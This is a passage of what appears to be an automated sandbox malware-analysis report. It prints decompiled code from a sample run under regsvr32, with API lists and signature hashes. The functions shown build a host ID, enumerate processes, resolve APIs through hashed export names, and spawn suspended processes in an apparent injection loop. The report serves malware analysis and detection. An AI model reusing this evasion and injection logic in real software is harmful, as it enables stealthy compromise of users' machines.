				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E04AF8D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x4b0f818; // 0x4c2f8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E04AF9DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E04AF8BAF( &_v16);
				_t33 = E04AFA456(_t43);
				E04AF9E51( &(_t43[E04AFA456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E04AFA456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E04AFE2C5(_t43, E04AFA456(_t43) + _t40, 0);
			}
















                                                                                                                                                                                              0x04afc5ec
                                                                                                                                                                                              0x04afc5f5
                                                                                                                                                                                              0x04afc601
                                                                                                                                                                                              0x04afc607
                                                                                                                                                                                              0x04afc609
                                                                                                                                                                                              0x04afc611
                                                                                                                                                                                              0x04afc61f
                                                                                                                                                                                              0x04afc624
                                                                                                                                                                                              0x04afc633
                                                                                                                                                                                              0x04afc63e
                                                                                                                                                                                              0x04afc64b
                                                                                                                                                                                              0x04afc665
                                                                                                                                                                                              0x04afc66a
                                                                                                                                                                                              0x04afc66c
                                                                                                                                                                                              0x04afc673
                                                                                                                                                                                              0x04afc683
                                                                                                                                                                                              0x04afc694
                                                                                                                                                                                              0x04afc69e
                                                                                                                                                                                              0x04afc6a6
                                                                                                                                                                                              0x04afc6ad
                                                                                                                                                                                              0x04afc6b0
                                                                                                                                                                                              0x04afc6cd

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 04AFC633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 04AFC665
                                                                                                                                                                                                • Part of subcall function 04AF9E51: _vsnwprintf.MSVCRT ref: 04AF9E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 04AFC69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 04AFC6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: 0630d3980eed6dd53d1f21d2e6255db70781059652fea707cebddafa1276d062
                                                                                                                                                                                              • Instruction ID: bab8544e7ac10d54c87e84eb6cc5a8515eaca294b5801adffe4fe49846565f1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0630d3980eed6dd53d1f21d2e6255db70781059652fea707cebddafa1276d062
                                                                                                                                                                                              • Instruction Fuzzy Hash: CA2174B2A00218BFEB10ABF4DD49FEF77BCEB54215F108565F605D3181EA74AE448B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFB96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E04AFB96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E04AF8D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x4b0f818; // 0x4c2f8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                                              0x04afb982
                                                                                                                                                                                              0x04afb984
                                                                                                                                                                                              0x04afb988
                                                                                                                                                                                              0x04afb98b
                                                                                                                                                                                              0x04afb98d
                                                                                                                                                                                              0x04afb992
                                                                                                                                                                                              0x04afb9a1
                                                                                                                                                                                              0x04afb9a9
                                                                                                                                                                                              0x04afb9bd
                                                                                                                                                                                              0x04afb9cd
                                                                                                                                                                                              0x04afb9d7
                                                                                                                                                                                              0x04afb9db
                                                                                                                                                                                              0x04afb9f8
                                                                                                                                                                                              0x04afb9ff
                                                                                                                                                                                              0x04afb9bf
                                                                                                                                                                                              0x04afb9bf
                                                                                                                                                                                              0x04afb9c5
                                                                                                                                                                                              0x04afb9ca
                                                                                                                                                                                              0x04afb9ca
                                                                                                                                                                                              0x04afb9bd
                                                                                                                                                                                              0x04afba08

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 04AFB988
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 04AFB9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 04AFB9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04AFB9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: 8e74b438aa0f9cedf8b973fa1554efa7566d804bc2d30efca56a3d5b9ac5c525
                                                                                                                                                                                              • Instruction ID: 72117b6cf1ff295b6c413d12e105cc9b377ba190f68f944817f12667b35a8fe2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e74b438aa0f9cedf8b973fa1554efa7566d804bc2d30efca56a3d5b9ac5c525
                                                                                                                                                                                              • Instruction Fuzzy Hash: F41163723043019FD320EEA8EC49EAB77ECFF85261F140A69F660C7190EB24E94587B1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFEEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 259 4afeebb-4afeed2 260 4afef2f 259->260 261 4afeed4-4afeefc 259->261 262 4afef31-4afef35 260->262 261->260 263 4afeefe-4afef21 call 4afa43d call 4afe2c5 261->263 268 4afef36-4afef4d 263->268 269 4afef23-4afef2d 263->269 270 4afef4f-4afef57 268->270 271 4afefa3-4afefa5 268->271 269->260 269->263 270->271 272 4afef59 270->272 271->262 273 4afef5b-4afef61 272->273 274 4afef63-4afef65 273->274 275 4afef71-4afef82 273->275 274->275 276 4afef67-4afef6f 274->276 277 4afef87-4afef93 LoadLibraryA 275->277 278 4afef84-4afef85 275->278 276->273 276->275 277->260 279 4afef95-4afef9f GetProcAddress 277->279 278->277 279->260 280 4afefa1 279->280 280->262
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFEEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E04AFE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E04AFA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                              0x04afeec4
                                                                                                                                                                                              0x04afeec6
                                                                                                                                                                                              0x04afeec9
                                                                                                                                                                                              0x04afeecc
                                                                                                                                                                                              0x04afeed2
                                                                                                                                                                                              0x04afef2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef2f
                                                                                                                                                                                              0x04afeed4
                                                                                                                                                                                              0x04afeedf
                                                                                                                                                                                              0x04afeee2
                                                                                                                                                                                              0x04afeee7
                                                                                                                                                                                              0x04afeeec
                                                                                                                                                                                              0x04afeeef
                                                                                                                                                                                              0x04afeef1
                                                                                                                                                                                              0x04afeef4
                                                                                                                                                                                              0x04afeef7
                                                                                                                                                                                              0x04afeefc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeefe
                                                                                                                                                                                              0x04afeefe
                                                                                                                                                                                              0x04afef10
                                                                                                                                                                                              0x04afef1d
                                                                                                                                                                                              0x04afef21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef23
                                                                                                                                                                                              0x04afef26
                                                                                                                                                                                              0x04afef27
                                                                                                                                                                                              0x04afef2d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef2d
                                                                                                                                                                                              0x04afef44
                                                                                                                                                                                              0x04afef49
                                                                                                                                                                                              0x04afef4d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef59
                                                                                                                                                                                              0x04afef59
                                                                                                                                                                                              0x04afef5b
                                                                                                                                                                                              0x04afef5b
                                                                                                                                                                                              0x04afef61
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef67
                                                                                                                                                                                              0x04afef6b
                                                                                                                                                                                              0x04afef6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef6f
                                                                                                                                                                                              0x04afef75
                                                                                                                                                                                              0x04afef7d
                                                                                                                                                                                              0x04afef82
                                                                                                                                                                                              0x04afef85
                                                                                                                                                                                              0x04afef85
                                                                                                                                                                                              0x04afef87
                                                                                                                                                                                              0x04afef8b
                                                                                                                                                                                              0x04afef93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef97
                                                                                                                                                                                              0x04afef9f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afef9f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 04AFEF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04AFEF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 738d4dee761b756342e05de7105503ef5699af35ca0feec4a2a70353fff75889
                                                                                                                                                                                              • Instruction ID: 9fa2aa27cb1a1af8c558468baf137d167cfa07c1355105b86e7394bb717fcfd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 738d4dee761b756342e05de7105503ef5699af35ca0feec4a2a70353fff75889
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6319071A001559BCB24CFEDCC80AAFBBF5AF44315F28446AEA45E73A1E730F9518B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFC7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 281 4afc7f5-4afc815 GetTokenInformation 282 4afc85b 281->282 283 4afc817-4afc820 GetLastError 281->283 284 4afc85d-4afc861 282->284 283->282 285 4afc822-4afc832 call 4af8bde 283->285 288 4afc838-4afc84b GetTokenInformation 285->288 289 4afc834-4afc836 285->289 288->282 290 4afc84d-4afc859 call 4af8bf4 288->290 289->284 290->289
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E04AFC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E04AF8BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E04AF8BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                              0x04afc7f8
                                                                                                                                                                                              0x04afc7f9
                                                                                                                                                                                              0x04afc800
                                                                                                                                                                                              0x04afc808
                                                                                                                                                                                              0x04afc80c
                                                                                                                                                                                              0x04afc815
                                                                                                                                                                                              0x04afc85b
                                                                                                                                                                                              0x04afc85b
                                                                                                                                                                                              0x04afc822
                                                                                                                                                                                              0x04afc82a
                                                                                                                                                                                              0x04afc82c
                                                                                                                                                                                              0x04afc832
                                                                                                                                                                                              0x04afc84b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc84d
                                                                                                                                                                                              0x04afc852
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afc858
                                                                                                                                                                                              0x04afc834
                                                                                                                                                                                              0x04afc834
                                                                                                                                                                                              0x04afc834
                                                                                                                                                                                              0x04afc834
                                                                                                                                                                                              0x04afc832
                                                                                                                                                                                              0x04afc861

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04AF0000,00000000,00000000,?,04AFC876,00000000,00000000,?,04AFC89F), ref: 04AFC810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC817
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: 28d49060859c8f5a8830980c74a0797eddb5e7c373e0aa952275856f725f024a
                                                                                                                                                                                              • Instruction ID: 1d94cd95122c52a8d7a635218adb964231775ab2788a9e44c1adbc74997637be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d49060859c8f5a8830980c74a0797eddb5e7c373e0aa952275856f725f024a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B0184B2700218BFAB305FE6DC48DAB7FACFF456B1750046AF605D3110E664ED0086E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFBC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 293 4afbc84-4afbcd3 call 4af8d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E04AFBC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E04AF8D6D(__edx, 0, 0x10);
				E04AF8D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                                              0x04afbc95
                                                                                                                                                                                              0x04afbca2
                                                                                                                                                                                              0x04afbcaa
                                                                                                                                                                                              0x04afbcc6
                                                                                                                                                                                              0x04afbccc
                                                                                                                                                                                              0x04afbcd3

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 04AFBCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: 6d1923bc193fea70f887899bd375d7e977f3972519e2d6edbbdfbba8726a9ab2
                                                                                                                                                                                              • Instruction ID: d56e805af093536bf3adc0ac92dc0cb37ec8dc0fa7fe5f55154e219127bc81c2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d1923bc193fea70f887899bd375d7e977f3972519e2d6edbbdfbba8726a9ab2
                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF030F16402087EFB30E6A59D0AFBF36ACDB51714F500125BB05EB1D0E6A4AD0582B5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04ABFF20 Relevance: 3.2, APIs: 2, Instructions: 195memoryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 298 4abff20-4abffbe VirtualAlloc call 4abfb50 call 4abfb90 303 4abffc9-4abffd3 298->303 304 4ac0031-4ac0083 call 4abfcd0 303->304 305 4abffd5-4abffdc 303->305 313 4ac0085-4ac0089 304->313 314 4ac00b1-4ac00b8 304->314 306 4abffde-4abffe5 305->306 307 4ac0026-4ac002f 305->307 306->307 309 4abffe7-4ac0023 call 4abfb90 306->309 307->303 309->307 313->314 317 4ac008b-4ac00ae call 4abfc30 313->317 315 4ac00c3-4ac00cd 314->315 318 4ac011f-4ac0154 call 4ac0440 315->318 319 4ac00cf-4ac00d6 315->319 317->314 322 4ac00d8-4ac00df 319->322 323 4ac0114-4ac011d 319->323 322->323 325 4ac00e1-4ac0112 call 4ac0160 VirtualProtect 322->325 323->315 325->323
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04ABFF6B
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000000), ref: 04AC0112
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocProtect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2447062925-0
                                                                                                                                                                                              • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction ID: 7e488008798fe0cbe252caee5635002024b6fef945b21da31b9c731678a7406c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E91BAB5A00209DFDB48CF98C590EAEB7B5FF88304F148159E815AB346D735EA52CFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFD804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 330 4afd804-4afd824 call 4afd6dc 333 4afd82a-4afd849 call 4afb557 330->333 334 4afd955-4afd958 330->334 337 4afd84f-4afd851 333->337 338 4afd945-4afd954 call 4af8bf4 333->338 339 4afd857-4afd859 337->339 340 4afd933-4afd943 call 4af8bf4 337->340 338->334 342 4afd85c-4afd85e 339->342 340->338 345 4afd864-4afd883 call 4af8d6d call 4afbc84 342->345 346 4afd921-4afd92d 342->346 352 4afd8e5-4afd8e9 345->352 353 4afd885-4afd898 call 4afd959 345->353 346->337 346->340 354 4afd8eb-4afd8ed 352->354 355 4afd914-4afd91b 352->355 353->352 360 4afd89a-4afd8b2 353->360 357 4afd8ef-4afd8f5 354->357 358 4afd8fe-4afd90e 354->358 355->342 355->346 357->358 358->355 363 4afd8b4-4afd8c9 GetLastError call 4afda57 360->363 364 4afd8e2 360->364 367 4afd8de-4afd8df FindCloseChangeNotification 363->367 368 4afd8cb-4afd8d6 363->368 364->352 367->364 370 4afd8d9 368->370 371 4afd8d8 368->371 370->367 371->370
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E04AFD804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E04AFD6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x4b0f81c; // 0x4c2fbe8
				_t7 = _t38 + 0xac; // 0x1d290ddf
				E04AFB557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E04AF8BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E04AF8D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E04AFBC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E04AFD959(E04AF61C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x4b0f818; // 0x4c2f8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E04AFDA57( &_v40);
									_t63 =  *0x4b0f818; // 0x4c2f8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x4b0f818; // 0x4c2f8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x4b0f818; // 0x4c2f8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x4b0f818; // 0x4c2f8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x4b0f818; // 0x4c2f8b0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E04AF8BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                                              0x04afd80a
                                                                                                                                                                                              0x04afd813
                                                                                                                                                                                              0x04afd816
                                                                                                                                                                                              0x04afd818
                                                                                                                                                                                              0x04afd81d
                                                                                                                                                                                              0x04afd81f
                                                                                                                                                                                              0x04afd822
